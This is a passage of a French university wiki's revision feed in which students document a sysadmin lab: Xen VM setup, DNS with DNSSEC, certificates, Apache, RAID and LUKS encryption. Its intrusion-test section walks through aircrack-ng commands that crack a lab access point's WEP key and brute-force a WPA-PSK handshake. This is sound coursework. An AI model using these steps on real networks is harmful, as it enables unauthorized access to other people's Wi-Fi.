On crée le dossier karmeliet.site.dnssec&lt;br /&gt;
 mkdir karmeliet.site.dnssec&lt;br /&gt;
&lt;br /&gt;
On crée la clef asymétrique de signature de clefs de zone&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On crée la clef asymétrique de la zone pour signer les enregistrements&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On renomme les deux paires de clefs avec le nom de notre zone en ajoutant -ksk et -zsk pour les clefs correspondantes.&lt;br /&gt;
&lt;br /&gt;
On inclue les clefs publiques dans votre fichier de zone db.karmeliet.site et on incrémente le numéro de version de la zone&lt;br /&gt;
 $include /etc/bind/karmeliet.site.dnssec/karmeliet.site-ksk.key&lt;br /&gt;
 $include /etc/bind/karmeliet.site.dnssec/karmeliet.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone&lt;br /&gt;
 dnssec-signzone -o karmeliet.site -k karmeliet.site-ksk ../db.karmeliet.site karmeliet.site-zsk&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier named.conf.local pour utiliser la zone signée de suffixe db.karmeliet.site.signed;&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu’à communiquer la partie publique de la KSK dans gandi.net&lt;br /&gt;
&lt;br /&gt;
==Certificat==&lt;br /&gt;
&lt;br /&gt;
Dans Gandi.net, on achète notre certificat en allant sur &lt;br /&gt;
 SSL certificate&lt;br /&gt;
&lt;br /&gt;
On nous demande une &amp;quot;Certificate Request&amp;quot; CSR que l'on a grâce à la commande &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
On remplit les différentes informations que l'on nous demande et on récupère notre csr dans server.csr à la fin de la commande.&lt;br /&gt;
&lt;br /&gt;
On va sur la page de notre certificat pour gandi et on copie colle comme ceci dans notre fichier db.karmeliet.site pour que notre certficat soit valide&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
 www	IN	A	193.48.57.179&lt;br /&gt;
 _D83578361950694C7CBA2CF57DDA0CE7.karmeliet.site. 10800 IN CNAME BEF099045291643A940FA49D11E8FB10.4CCF28E6A180333498A3F008A8B6CB32.0e21313c9c6df2403142.sectigo.com.&lt;br /&gt;
&lt;br /&gt;
==Serveur apache==&lt;br /&gt;
&lt;br /&gt;
On installe un serveur apache pour vérifier que tout fonctionne&lt;br /&gt;
 apt install apache2&lt;br /&gt;
&lt;br /&gt;
Pour installer apache correctement on a suivi les instructions sur ce site&lt;br /&gt;
 https://ubuntu.com/tutorials/install-and-configure-apache#1-overview&lt;br /&gt;
&lt;br /&gt;
Puis on a modifié notre fichier de configuration apache se trouvant dans /etc/apache2/sites-available&lt;br /&gt;
pour y mettre notre certificat :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site&lt;br /&gt;
         Redirect permanent / https://karmeliet.site/&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt; &lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site &lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /root/karmeliet.site.crt&lt;br /&gt;
         SSLCertificateKeyFile /root/karmeliet.site.key&lt;br /&gt;
 &lt;br /&gt;
         ErrorLog ${APACHE_LOG_DIR}/error.log&lt;br /&gt;
         CustomLog ${APACHE_LOG_DIR}/access.log combined&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;br /&gt;
&lt;br /&gt;
On obtiens après quelques heures le résultat :&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ 59911999 ]&lt;br /&gt;
&lt;br /&gt;
 Master Key : EF A3 6F 02 E7 F1 DF 01 62 03 92 87 81 ED 99 6D &lt;br /&gt;
              25 28 7D D6 54 FC 29 41 5D BD E9 02 26 E7 F0 58&lt;br /&gt;
&lt;br /&gt;
=Réalisation=&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de données==&lt;br /&gt;
&lt;br /&gt;
Nous créons trois partitions LVM de 1Go dans le groupe de volume storage avec comme noms celui de notre serveur&lt;br /&gt;
 lvcreate -L1G -n oronge-raid1 storage&lt;br /&gt;
 lvcreate -L1G -n oronge-raid2 storage&lt;br /&gt;
 lvcreate -L1G -n oronge-raid3 storage&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les partitions à notre fichier de configuration qui se trouve dans /etc/xen/Karmeliet.cfg&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
On éteint puis relance la VM et on crée la partition Raid&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3&lt;br /&gt;
&lt;br /&gt;
On formate la partition en ext4&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
On ajoute au fichier /etc/fstab la partition formaté /dev/md0 pour qu'il soit monté durant le démarrage de la VM&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
==Chiffrement de données==&lt;br /&gt;
&lt;br /&gt;
On installe avec apt cryptsetup&lt;br /&gt;
 apt install lvm2 cryptsetup&lt;br /&gt;
&lt;br /&gt;
On regarde où est notre clé usb grâce à la commande lsblk, dans notre cas elle est dans sdb&lt;br /&gt;
&lt;br /&gt;
On la formatte &lt;br /&gt;
 mkfs.ext4 /dev/sdb&lt;br /&gt;
&lt;br /&gt;
On initialise notre clé USB avec l'option luksFormat et on choisis un mot de passe &lt;br /&gt;
 cryptsetup luksFormat /dev/sdb&lt;br /&gt;
&lt;br /&gt;
On ouvre notre partition chiffrée avec luksOpen (le nom du volume sera karmeliet_crypted) et on la formatte :&lt;br /&gt;
 cryptsetup luksOpen /dev/sdc karmeliet_crypted&lt;br /&gt;
 mkfs.ext4 /dev/mapper/karmeliet_crypted&lt;br /&gt;
&lt;br /&gt;
On monte la partition &lt;br /&gt;
 mkdir /mnt/karmelietCrypte&lt;br /&gt;
 mount -t ext4 /dev/mapper/karmeliet_crypted /mnt/karmelietCrypte/ &lt;br /&gt;
&lt;br /&gt;
On y ajoute un fichier texte hello dans lequel on  écrit &amp;quot;cc&amp;quot; puis on démonte la clé et on ferme le volume chiffré&lt;br /&gt;
 umount /mnt/karmelietCrypte&lt;br /&gt;
 cryptsetup luksClose karmeliet_crypted&lt;br /&gt;
&lt;br /&gt;
On a plus qu'a aller tester notre clé USB en la montant sur l'ordinateur d'un autre binôme et cela nous demande bien de rentrer un mot de passe notre clé est chiffré.&lt;br /&gt;
&lt;br /&gt;
=Ferme de serveurs Web=&lt;br /&gt;
&lt;br /&gt;
==ASR lab project==&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57814</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57814"/>
				<updated>2022-01-10T18:27:06Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* Chiffrement de données */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
=Services Internet=&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter en ssh, nous allons dans le fichier se trouvant au chemin :&lt;br /&gt;
 /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente Port et PermitRootLogin et on leur donne la valeur :&lt;br /&gt;
&lt;br /&gt;
 Port 22222&lt;br /&gt;
 PermitRootLogin Yes&lt;br /&gt;
&lt;br /&gt;
On a plus qu'à se connecter via ssh  : &lt;br /&gt;
 ssh root@193.48.57.179 -p 22222&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DNS==&lt;br /&gt;
&lt;br /&gt;
On réserve un nom de domaine sur ghandi.net, en l'occurrence le notre sera : &lt;br /&gt;
 karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On rentre notre adresse IPv4 dans le &amp;quot;Glue records&amp;quot;&lt;br /&gt;
 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
On ajoute nos DNS primaire et secondaire pour obtenir un nom de serveur&lt;br /&gt;
 ns1.karmeliet.site (primaire)&lt;br /&gt;
 ns6.gandi.net (secondaire)&lt;br /&gt;
&lt;br /&gt;
===Configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
On installe les paquets&lt;br /&gt;
 apt install bind9&lt;br /&gt;
&lt;br /&gt;
On change le fichier /etc/resolv.conf&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
On va configurer notre DNS primaire dans le fichier de configuration /etc/bind/named.conf.local&lt;br /&gt;
De plus, on autorise le transfert d'information avec le DNS Secondaire (217.70.177.40)&lt;br /&gt;
 zone &amp;quot;karmeliet.site&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/db.karmeliet.site&amp;quot;;&lt;br /&gt;
   allow-transfer { 217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
On créé un fichier db.karmeliet.site ayant le même template que db.local &lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
On ajoute dans le fichier named.conf.options&lt;br /&gt;
 dnssec-enable yes; &lt;br /&gt;
&lt;br /&gt;
On va dans le dossier bind&lt;br /&gt;
 /etc/bind&lt;br /&gt;
&lt;br /&gt;
On crée le dossier karmeliet.site.dnssec&lt;br /&gt;
 mkdir karmeliet.site.dnssec&lt;br /&gt;
&lt;br /&gt;
On crée la clef asymétrique de signature de clefs de zone&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On crée la clef asymétrique de la zone pour signer les enregistrements&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On renomme les deux paires de clefs avec le nom de notre zone en ajoutant -ksk et -zsk pour les clefs correspondantes.&lt;br /&gt;
&lt;br /&gt;
On inclue les clefs publiques dans votre fichier de zone db.karmeliet.site et on incrémente le numéro de version de la zone&lt;br /&gt;
 $include /etc/bind/karmeliet.site.dnssec/karmeliet.site-ksk.key&lt;br /&gt;
 $include /etc/bind/karmeliet.site.dnssec/karmeliet.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone&lt;br /&gt;
 dnssec-signzone -o karmeliet.site -k karmeliet.site-ksk ../db.karmeliet.site karmeliet.site-zsk&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier named.conf.local pour utiliser la zone signée de suffixe db.karmeliet.site.signed;&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu’à communiquer la partie publique de la KSK dans gandi.net&lt;br /&gt;
&lt;br /&gt;
==Certificat==&lt;br /&gt;
&lt;br /&gt;
Dans Gandi.net, on achète notre certificat en allant sur &lt;br /&gt;
 SSL certificate&lt;br /&gt;
&lt;br /&gt;
On nous demande une &amp;quot;Certificate Request&amp;quot; CSR que l'on a grâce à la commande &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
On remplit les différentes informations que l'on nous demande et on récupère notre csr dans server.csr à la fin de la commande.&lt;br /&gt;
&lt;br /&gt;
On va sur la page de notre certificat pour gandi et on copie colle comme ceci dans notre fichier db.karmeliet.site pour que notre certficat soit valide&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
 www	IN	A	193.48.57.179&lt;br /&gt;
 _D83578361950694C7CBA2CF57DDA0CE7.karmeliet.site. 10800 IN CNAME BEF099045291643A940FA49D11E8FB10.4CCF28E6A180333498A3F008A8B6CB32.0e21313c9c6df2403142.sectigo.com.&lt;br /&gt;
&lt;br /&gt;
==Serveur apache==&lt;br /&gt;
&lt;br /&gt;
On installe un serveur apache pour vérifier que tout fonctionne&lt;br /&gt;
 apt install apache2&lt;br /&gt;
&lt;br /&gt;
Pour installer apache correctement on a suivi les instructions sur ce site&lt;br /&gt;
 https://ubuntu.com/tutorials/install-and-configure-apache#1-overview&lt;br /&gt;
&lt;br /&gt;
Puis on a modifié notre fichier de configuration apache se trouvant dans /etc/apache2/sites-available&lt;br /&gt;
pour y mettre notre certificat :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site&lt;br /&gt;
         Redirect permanent / https://karmeliet.site/&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt; &lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site &lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /root/karmeliet.site.crt&lt;br /&gt;
         SSLCertificateKeyFile /root/karmeliet.site.key&lt;br /&gt;
 &lt;br /&gt;
         ErrorLog ${APACHE_LOG_DIR}/error.log&lt;br /&gt;
         CustomLog ${APACHE_LOG_DIR}/access.log combined&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;br /&gt;
&lt;br /&gt;
=Réalisation=&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de données==&lt;br /&gt;
&lt;br /&gt;
Nous créons trois partitions LVM de 1Go dans le groupe de volume storage avec comme noms celui de notre serveur&lt;br /&gt;
 lvcreate -L1G -n oronge-raid1 storage&lt;br /&gt;
 lvcreate -L1G -n oronge-raid2 storage&lt;br /&gt;
 lvcreate -L1G -n oronge-raid3 storage&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les partitions à notre fichier de configuration qui se trouve dans /etc/xen/Karmeliet.cfg&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
On éteint puis relance la VM et on crée la partition Raid&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3&lt;br /&gt;
&lt;br /&gt;
On formate la partition en ext4&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
On ajoute au fichier /etc/fstab la partition formaté /dev/md0 pour qu'il soit monté durant le démarrage de la VM&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
==Chiffrement de données==&lt;br /&gt;
&lt;br /&gt;
On installe avec apt cryptsetup&lt;br /&gt;
 apt install lvm2 cryptsetup&lt;br /&gt;
&lt;br /&gt;
On regarde où est notre clé usb grâce à la commande lsblk, dans notre cas elle est dans sdb&lt;br /&gt;
&lt;br /&gt;
On la formatte &lt;br /&gt;
